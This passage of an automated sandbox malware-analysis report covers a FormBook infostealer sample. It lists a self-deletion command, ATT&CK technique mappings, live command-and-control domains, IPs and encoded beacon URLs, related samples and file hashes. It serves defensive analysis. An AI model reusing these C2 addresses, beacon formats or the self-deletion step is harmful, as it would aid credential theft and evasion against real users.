Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Process created: C:\Users\user\Desktop\tgamf4XuLa.exe C:\Users\user\Desktop\tgamf4XuLa.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe'	Jump to behavior

Source: explorer.exe, 00000007.00000000.277193116.0000000001398000.00000004.00000020.sdmp	Binary or memory string: ProgmanamF
Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.277406579.0000000001980000.00000002.00020000.sdmp, control.exe, 00000014.00000002.501189951.0000000003900000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Queries volume information: C:\Users\user\Desktop\tgamf4XuLa.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\tgamf4XuLa.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\tgamf4XuLa.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection612	Masquerading1	OS Credential Dumping	Security Software Discovery221	Remote Services	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection612	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information11	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information4	Cached Domain Credentials	System Information Discovery112	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Timestomp1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	File Deletion1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
tgamf4XuLa.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\HpnpObXJP.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.2.tgamf4XuLa.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY	0%	Avira URL Cloud	safe
http://www.cherrybunk.life/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz	0%	Avira URL Cloud	safe
http://www.syzhtr.com/vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo	0%	Avira URL Cloud	safe
http://www.d0berman245.xyz/vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo	0%	Avira URL Cloud	safe
http://www.fraktal.media/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB	0%	Avira URL Cloud	safe
https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png	0%	Avira URL Cloud	safe
http://www.realstylecelebz.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0	0%	Avira URL Cloud	safe
http://www.dressmids.com/vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo	0%	Avira URL Cloud	safe
http://www.tjandamber.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5	0%	Avira URL Cloud	safe
www.dressmids.com/vuja/	0%	Avira URL Cloud	safe
http://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fraktal.media	34.98.99.30	true	false	unknown
www.cherrybunk.life	52.25.92.0	true	true	unknown
www.hellocharmaine.com	91.195.240.94	true	true	unknown
www.syzhtr.com	103.72.144.19	true	true	unknown
expertexceleratorchallenge.com	34.98.99.30	true	false	unknown
www.d0berman245.xyz	99.83.154.118	true	true	unknown
www.realstylecelebz.com	99.83.154.118	true	true	unknown
dressmids.com	34.98.99.30	true	false	unknown
www.discomountainkombucha.com	91.195.240.94	true	true	unknown
tjandamber.com	34.102.136.180	true	false	unknown
www.tjandamber.com	unknown	unknown	true	unknown
www.fraktal.media	unknown	unknown	true	unknown
www.expertexceleratorchallenge.com	unknown	unknown	true	unknown
www.dressmids.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.hellocharmaine.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY	true	Avira URL Cloud: safe	unknown
http://www.cherrybunk.life/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz	true	Avira URL Cloud: safe	unknown
http://www.syzhtr.com/vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo	true	Avira URL Cloud: safe	unknown
http://www.d0berman245.xyz/vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo	true	Avira URL Cloud: safe	unknown
http://www.fraktal.media/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB	false	Avira URL Cloud: safe	unknown
http://www.realstylecelebz.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0	true	Avira URL Cloud: safe	unknown
http://www.dressmids.com/vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo	false	Avira URL Cloud: safe	unknown
http://www.tjandamber.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5	false	Avira URL Cloud: safe	unknown
www.dressmids.com/vuja/	true	Avira URL Cloud: safe	low
http://www.discomountainkombucha.com/vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.value-domain.com/	control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp	false		high
https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png	control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.value-domain.com/modall.php	control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
91.195.240.94	www.hellocharmaine.com	Germany	47846	SEDO-ASDE	true
52.25.92.0	www.cherrybunk.life	United States	16509	AMAZON-02US	true
34.102.136.180	tjandamber.com	United States	15169	GOOGLEUS	false
99.83.154.118	www.d0berman245.xyz	United States	16509	AMAZON-02US	true
34.98.99.30	fraktal.media	United States	15169	GOOGLEUS	false
103.72.144.19	www.syzhtr.com	China	135377	UHGL-AS-APUCloudHKHoldingsGroupLimitedHK	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483617
Start date:	15.09.2021
Start time:	10:07:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 2s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	tgamf4XuLa (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/4@10/7
EGA Information:	Failed
HDC Information:	Successful, ratio: 42.9% (good quality ratio 38%) Quality average: 72.5% Quality standard deviation: 32.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 73 Number of non-executed functions: 117
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.50.102.62, 67.27.141.126, 8.248.119.254, 8.238.85.126, 8.248.139.254, 8.238.85.254, 40.112.88.60, 23.216.77.209, 23.216.77.208 Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, fs.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/483617/sample/tgamf4XuLa.exe

Simulations

Behavior and APIs

Time	Type	Description
10:08:32	API Interceptor	1x Sleep call for process: tgamf4XuLa.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
91.195.240.94	Payment.exe	Get hash	malicious	Browse	www.cevicheatl.com/pm7s/?v2J83=dDHD9XVxev94&-Zi=VaPpcx8n3Tp8D9xgbNtl8vulXgBvw8jFIvpULVCQhIlh0W4Hjuc6qrQSfYpFlZollCUL
	pronto per il pagamento.exe	Get hash	malicious	Browse	www.kosha2030.com/cb3b/?hV2=rqbUo6j2KmhlDLlvmj6v60cfZ8/2Wb9u+KYnQWuAInoB2FLYYFx1yPNzvLEIuH4s1sVu&2d_HDh=b4KXxR6XiV5lmHh0
	PO-PT. Hextar-Sept21.xlsx	Get hash	malicious	Browse	www.garfld.com/imi7/?bVx=AFMvowp2dypQPpLZR6/sAbLaaLiFVzdlH2gx+8GSqBhOmfQ8NBa2GdB0GH1Hzk2pvxNNYQ==&Nx=8pFdqHyxnZUl
	P.O100%uFFFDpayment.doc__.rtf	Get hash	malicious	Browse	www.cis-thailand.com/crg3/?9rWP=SnroaQgsYxMLiTImvCpI1Gl07kg1+3LZiriLgRT6WM6KSYrus5bHWYAPsUyD9HyCzSS3+w==&wTcHGb=ylr8U6ypj
	Quotation Required Details.exe	Get hash	malicious	Browse	www.promosplace.com/p4se/?l2Mdnb=g+K9AOIBn0/VHfOvEruut/gc0uElQ8afuAuUP1bYE2eC/PWXrO3ELwGMR3TL6eUTg0Vn&fFQL=6lZPcVbxGH
	DUE INVOICES.exe	Get hash	malicious	Browse	www.mgm2348543.com/b6cu/?R2MD6=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7fmeqANspZbM&BT=2dhhnfvPB6f8zBxp
	Order_confirmation_ SMKT 09062021_.exe	Get hash	malicious	Browse	www.preaked.com/h2m4/?2d=HxKWzMaF1BWGIaYUxE2WWBBllJBIGc2hs3LD5EFS7XDw0kpNhCyQgmCJtlxKKPUpl4+d&D2MH9=9rWdhfN8M
	nFzJnfmTNh.exe	Get hash	malicious	Browse	www.mgm2348543.com/b6cu/?aT=jvQLaT&MD=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7cGOlhdU38yL
	0039234_00533MXS2.exe	Get hash	malicious	Browse	www.dandhgh.com/m64e/?H2MDD=hQTNvBW47KQ9P36N1I31K6xMq6TLiyTboYpfo/Bbm9l3Z3kS2jzEmMODUoxriuOWTqDJ&DxoLn=7nU4v4ghr2A8WLZ
	Unpaid Invoice.exe	Get hash	malicious	Browse	www.mgm2348543.com/b6cu/?WFN=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7cGOlhdU38yL&Sjlpi=9ruD_h9
	174jAWlXyW.exe	Get hash	malicious	Browse	www.bharathub.net/b6cu/?f2M=_v-HI&9r=vUP3bPk6qVMFSBZsu0WoakUB9ZLAJM2aLct125UMa7nObtIS9UcRmSBQP/rfZ6EDwLD9
	Payment Advice.xlsx	Get hash	malicious	Browse	www.mgm2348543.com/b6cu/?O8=-ZcPjPvhqPppnvL&bzu4_=dqsOYsWVq5FXUo6DYO7UsXHrG00vcvVIPPqXZD6UV3Cojp7qddL1qZML45qYhxZn8/v7Kg==
	RFQ_PO_009890_pdf.exe	Get hash	malicious	Browse	www.swipehawk.com/a6hg/?Gz=UharbDuqOmkTaf35LjnpLxSjggODaklpW9Y+tG2s+LMkdYLf42pUDMwAxcb4x47jVGJ2VGfNbQ==&-ZsLG=3ff8xpG0DPWtZdZ
	Swift Copy.exe	Get hash	malicious	Browse	www.mgm2348543.com/b6cu/?2dSpM=dqsOYsWQq+FTU42PaO7UsXHrG00vcvVIPPyHFAmVRXCpjYXsaNa58d0J7cGOlhdU38yL&PVvtW=7nWhA
	LC copy, Terms conditions.xlsx	Get hash	malicious	Browse	www.wqfilter.com/i7dg/?BBJ43b=f8iD9L4afkGSBNeT1a2zV06Ib9jyqzB9Ki8lcYXtvMA4ssIJMUtZ9Lijkg3d2xO4598lPA==&4hExr=GBXdRHy8-0z0
	Order sheet 31082021.exe	Get hash	malicious	Browse	www.promosplace.com/p4se/?H0D=v48Tu4dpfV5&F8R8gJ=g+K9AOIBn0/VHfOvEruut/gc0uElQ8afuAuUP1bYE2eC/PWXrO3ELwGMR3TL6eUTg0Vn
	PAYMENT INSTRUCTIONS COPY.exe	Get hash	malicious	Browse	www.hostings.company/n58i/?7nxhvxdX=m2fUwKHXntk7+v0FXrNTEkwXJjJFTAENR7+CI2dV9M7+9BuBSatPMImaRSslo8DZxWmb&z0D83b=1butZX4hMzCL_
	Shipment Advise 20035506.exe	Get hash	malicious	Browse	www.hostings.company/n58i/?CRmti4J=m2fUwKHXntk7+v0FXrNTEkwXJjJFTAENR7+CI2dV9M7+9BuBSatPMImaRRAm0MPh83bNGIKsaA==&EDHH=SL3Xb8KPdN
	PO 4100066995.exe	Get hash	malicious	Browse	www.vaca.travel/bp39/?nVR=5Qm4YdS9nP4uT06ysd2e9bB4EWW6DLhAof8Noh1nKxRE1PX3o+aVuPjzTEVLAN9Xs7Ly&fFNDaX=7nmPgJPxr
	uXNn71mPwRw5qVi.exe	Get hash	malicious	Browse	www.anacshops.com/z01e/?9rgLWb38=UkWWCKefa2QBOILDZj1DEjSIa8P8jMrEvFnGp+Vhsnwupfyaki4wDZ8Hwm0s3MMh54tn&Sjlpd=9ruDZ

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AMAZON-02US	SRMETALINDUSTRIES.exe	Get hash	malicious	Browse	44.227.65.245
	PI L032452021xxls.exe	Get hash	malicious	Browse	99.83.154.118
	Unpaid invoice.exe	Get hash	malicious	Browse	99.83.154.118
	FaxGUO65DE.391343-Faa.html	Get hash	malicious	Browse	3.139.50.24
	FaxGUO65DE.391343-Faa.html	Get hash	malicious	Browse	3.139.50.24
	Elon Musk Club - 024705 .htm	Get hash	malicious	Browse	13.226.156.103
	PGQBjDmDZ4	Get hash	malicious	Browse	34.249.145.219
	m5DozqUO2t	Get hash	malicious	Browse	54.70.167.99
	avxeC9Wssi	Get hash	malicious	Browse	13.52.148.225
	Wh3hrPWbBG	Get hash	malicious	Browse	34.249.145.219
	re2.x86	Get hash	malicious	Browse	184.77.232.100
	re2.arm7	Get hash	malicious	Browse	63.32.132.1
	Fourlokov9.x86	Get hash	malicious	Browse	34.249.145.219
	re2.x86	Get hash	malicious	Browse	54.96.126.50
	re2.arm	Get hash	malicious	Browse	18.226.174.198
	XbvAoRKnFm.exe	Get hash	malicious	Browse	52.218.0.168
	Enclosed.xlsx	Get hash	malicious	Browse	13.238.159.178
	HBW PAYMENT LIST FOR 2021,20210809.xlsx	Get hash	malicious	Browse	3.139.183.122
	debit.xlsx	Get hash	malicious	Browse	52.77.232.215
	UPDATED e-STATEMENT.exe	Get hash	malicious	Browse	75.2.37.224
SEDO-ASDE	Payment.exe	Get hash	malicious	Browse	91.195.240.94
	PAYSLIP.exe	Get hash	malicious	Browse	91.195.240.117
	UPDATED e-STATEMENT.exe	Get hash	malicious	Browse	91.195.240.87
	2021091400983746_pdf.exe	Get hash	malicious	Browse	91.195.240.13
	pronto per il pagamento.exe	Get hash	malicious	Browse	91.195.240.94
	ENQUIRYSMRT119862021-ERW PIPES.pdf.exe	Get hash	malicious	Browse	91.195.240.13
	ryfAIJHmKETyAPz.exe	Get hash	malicious	Browse	91.195.240.87
	NOA_-_CMA_CGM_ARRIVAL_NOTICE .exe	Get hash	malicious	Browse	91.195.240.117
	PO-PT. Hextar-Sept21.xlsx	Get hash	malicious	Browse	91.195.240.94
	P.O100%uFFFDpayment.doc__.rtf	Get hash	malicious	Browse	91.195.240.94
	Data Sheet and Profile.exe	Get hash	malicious	Browse	91.195.240.117
	Order 45789011.exe	Get hash	malicious	Browse	91.195.240.13
	Quotation Required Details.exe	Get hash	malicious	Browse	91.195.240.94
	54U89TvWvD.exe	Get hash	malicious	Browse	91.195.240.87
	Order no.1480-G22-21202109.xlsx	Get hash	malicious	Browse	91.195.240.117
	BK8476699_BOOKING.exe	Get hash	malicious	Browse	91.195.240.87
	Swift 07.09.21.exe	Get hash	malicious	Browse	91.195.240.87
	Required quantity.doc	Get hash	malicious	Browse	91.195.240.117
	chUG6brzt9.exe	Get hash	malicious	Browse	91.195.240.117
	BahcfFNy25bmV1c.exe	Get hash	malicious	Browse	91.195.240.13

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\tgamf4XuLa.exe.log Download File
Process:	C:\Users\user\Desktop\tgamf4XuLa.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp Download File
Process:	C:\Users\user\Desktop\tgamf4XuLa.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1642
Entropy (8bit):	5.193011313049836
Encrypted:	false
SSDEEP:	24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBWtn:cbh47TlNQ//rydbz9I3YODOLNdq32
MD5:	CD336816B8CEB455A42F961A8F08D0D7
SHA1:	E6C59289EB46C0E12240D674A4230F83A632ABEB
SHA-256:	4056571BCD25053290D7350F6A47757771FED7F84F5C1A5B0EFAB382FBD56217
SHA-512:	9A2B4A596DF487B296618B1CD05A8EF0AA83216A480A0F5C9E5D708DC7B62D71321D3E6E16BA291202E0F7D212E11194334EA6A20CB4B3BC77751854CE0560A8
Malicious:	true
